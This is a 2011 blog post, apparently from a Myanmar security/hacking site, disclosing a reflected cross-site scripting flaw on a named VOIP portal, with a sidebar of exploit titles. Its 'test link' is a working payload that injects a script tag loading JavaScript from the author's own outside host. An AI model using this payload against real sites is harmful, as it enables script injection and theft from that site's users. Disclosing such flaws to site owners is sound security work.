critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Home / Hacking, News, Security / critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

September 28, 2011 PlanetCreator 0 Comments 0 tags

PlanetCreator has reported another critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

This vulnerability has been informed to :- webmaster

Cross-site scripting (XSS) is a type of computer security vulnerability typically found in web applications that enables malicious attackers to inject client-side script into web pages viewed by other users. An exploited cross-site scripting vulnerability can be used by attackers to bypass access controls such as the same origin policy.

Test Link

http://voip.yatanarpon.com.mm/myanmar-webportal/index.jsp?msg=<script src=http://www.planetcreator.net/attacking/xss/planetcreator-xss.js></script>

We hope that your security staff will look into this issue and fix it as soon as possible.

[local] unzip-stream 0.3.1 - Arbitrary File Write
on April 30, 2025 at 12:00 am
unzip-stream 0.3.1 - Arbitrary File Write
[remote] OpenSSH server (sshd) 9.8p1 - Race Condition
on April 22, 2025 at 12:00 am
OpenSSH server (sshd) 9.8p1 - Race Condition
[local] Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege
on April 22, 2025 at 12:00 am
Microsoft Windows 11 23h2 - CLFS.sys Elevation of Privilege
[remote] WonderCMS 3.4.2 - Remote Code Execution (RCE)
on April 22, 2025 at 12:00 am
WonderCMS 3.4.2 - Remote Code Execution (RCE)
[remote] code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS)
on April 22, 2025 at 12:00 am
code-projects Online Exam Mastering System 1.0 - Reflected Cross-Site Scripting (XSS)

critical XSS Vulnerability on Yatanarpon VOIP http://voip.yatanarpon.com.mm

Explore More

Website of meteorologist U Tun Lwin hacked

Dont be scared! Itâ€™s just a scareware. About latest scarewareâ€™s

Password breaking service (Stolen password recovery)